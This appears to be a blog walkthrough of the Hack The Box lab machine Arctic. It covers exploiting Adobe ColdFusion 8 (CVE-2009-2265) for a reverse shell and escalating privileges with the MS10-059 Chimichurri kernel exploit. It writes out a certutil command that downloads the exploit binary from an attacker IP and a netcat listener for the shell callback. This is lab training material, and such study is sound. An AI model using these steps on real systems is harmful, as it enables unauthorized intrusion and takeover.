Post

Arctic - HTB Walkthrough

Arctic is a retired Hack The Box machine that highlights the dangers of outdated web server software and unpatched Windows kernel…

Arctic - HTB Walkthrough

Arctic is a retired Hack The Box machine that highlights the dangers of outdated web server software and unpatched Windows kernel…


Arctic — HTB Walkthrough

image

Arctic is a retired Hack The Box machine that highlights the dangers of outdated web server software and unpatched Windows kernel vulnerabilities. This guide covers the process from initial enumeration to gaining root access.

Room Link: https://app.hackthebox.com/machines/Arctic

Reconnaissance

Starting with a full port scan:

1
nmap -T4 -p- -A <MACHINE_IP>

image

Nmap Scan Results:

  • Port 135/tcp: Microsoft Windows RPC- Port 8500/tcp: JRun Web Server- Port 49154/tcp: Microsoft Windows RPC

The OS fingerprint suggests Windows Server 2008 R2 / Windows 7 (64-bit). The interesting service here is the JRun Web Server on port 8500.

Web Enumeration

Browsing to <MACHINE_IP> reveals a directory listing with two folders:image

Navigating to cfdocs/dochome.htm confirms the server is running Adobe ColdFusion 8 — an old and well-known vulnerable version.image

Initial Foothold — CVE-2009–2265 (RCE)

Adobe ColdFusion 8 is vulnerable to an unauthenticated file upload that leads to remote code execution.

Exploit: https://www.exploit-db.com/exploits/50057image

Download the exploit script and update the connection parameters:

Before running the exploit, we must modify the configuration values:

  • LHOST — our attack machine IP- LPORT — listener port- RPORT — target service port

After updating these parameters in the exploit script, we prepare to receive a reverse shell.image

Run the exploit:

1
python3 50057.py

The script generates a JSP payload, uploads it via the vulnerable file upload endpoint, then executes it — catching a reverse shell on port 4444:imageimage

User Flag

Navigate to the user’s Desktop and read the flag:

1
cd C:\Users\tolis\Desktoptype user.txt

image

Privilege Escalation

Windows Exploit Suggester

Collect system information using systeminfo and feed it to windows-exploit-suggester.

1
python2 windows-exploit-suggester.py --database 2026–03–02-mssb.xls --systeminfo sysinfo.txt

Among the results, MS10–059 stands out:image

Exploiting MS10–059 (Chimichurri)

Download the pre-compiled binary from:

windows-kernel-exploits/MS10-059: Chimichurri/Compiled at master · egre55/windows-kernel-exploits
Windows Kernel Exploits. Contribute to egre55/windows-kernel-exploits development by creating an account on GitHub.github.com

Transfer to the target:

1
certutil -urlcache -f http://<ATTCKER_IP>/Chimichurri.exe Chimichurri.exe

image

Set up a listener on the attacker machine:

1
nc -lvnp 9999

Execute the exploit, pointing the callback to the attacker:image

A new shell arrives:image

Root Flag

1
cd C:/users/administrator/desktoptype root.txt

Conclusion

The Arctic machine demonstrates why keeping web applications and underlying operating systems patched is critical. A decade-old ColdFusion vulnerability provided the initial foothold, and an unpatched kernel allowed for a total system takeover .

Thanks for reading!

This post is licensed under CC BY 4.0 by the author.